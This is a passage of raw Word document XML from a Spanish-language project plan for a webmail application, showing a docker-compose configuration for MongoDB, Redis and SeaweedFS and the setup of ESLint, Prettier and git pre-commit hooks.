        </w:rPr>
        <w:t xml:space="preserve">dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages/api/Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> production</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">container_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> webmail6_api</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NODE_ENV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> production</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3000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">MONGODB_URI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongodb://admin:${MONGO_PASSWORD}@mongo:27017/webmail6?authSource=admin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">REDIS_URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> redis://redis:6379</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SEAWEEDFS_ENDPOINT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://seaweedfs:8333</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KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongo_root_password</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> jwt_secret</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> encryption_key</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mongo</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seaweedfs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webmail6_net</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"wget"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"-q"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"--spider"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://localhost:3000/health/live"</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start_period</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 30s</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512M </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">reservations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128M </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">logging</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json-file</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">options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max-size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"10m"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">max-file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"3"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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mongo_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">redis_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">seaweed_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">certbot_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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webmail6_net</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mongo_root_password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> MONGO_PASSWORD</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">jwt_secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> JWT_SECRET</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">encryption_key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ENCRYPTION_KEY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Levantar la infraestructura:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> compose up </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongo redis seaweedfs</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Verificar salud</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> compose ps</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Esperar a que mongo reporte healthy antes de continuar</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> compose logs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongo</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="177"/>
    <w:bookmarkStart w:id="178" w:name="typescript-strict-eslint-prettier"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.1.3 TypeScript Strict, ESLint + Prettier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Configuración ESLint flat config</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> eslint.config.js </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;&lt; 'EOF'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import js from '@eslint/js';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import tseslint from 'typescript-eslint';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import vue from 'eslint-plugin-vue';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import prettier from 'eslint-config-prettier';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">export default tseslint.config(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  js.configs.recommended,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  ...tseslint.configs.strictTypeChecked,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  ...tseslint.configs.stylisticTypeChecked,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  ...vue.configs['flat/recommended'],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  prettier,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    languageOptions: {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      parserOptions: {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        projectService: true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        tsconfigRootDir: import.meta.dirname,</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files: ['**/*.vue'],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    languageOptions: {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      parser: vue.parser,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      parserOptions: {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        parser: tseslint.parser,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        projectService: true,</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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">EOF</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Prettier config</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> .prettierrc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;&lt; 'EOF'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "semi": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "singleQuote": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "tabWidth": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "trailingComma": "es5",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "printWidth": 100</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">EOF</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Git hooks con simple-git-hooks + lint-staged</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> simple-git-hooks lint-staged</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># package.json scripts addition:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># "prepare": "simple-git-hooks"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># simple-git-hooks config:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># "simple-git-hooks": { "pre-commit": "pnpm lint-staged" }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># lint-staged config:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># "lint-staged": { "*.{ts,vue}": ["eslint --fix", "prettier --write"] }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Validación:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm lint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">debe ejecutarse sin errores en el template inicial.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="178"/>
    <w:bookmarkEnd w:id="179"/>
    <w:bookmarkStart w:id="185" w:name="fase-2-backend-core-semanas-2-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
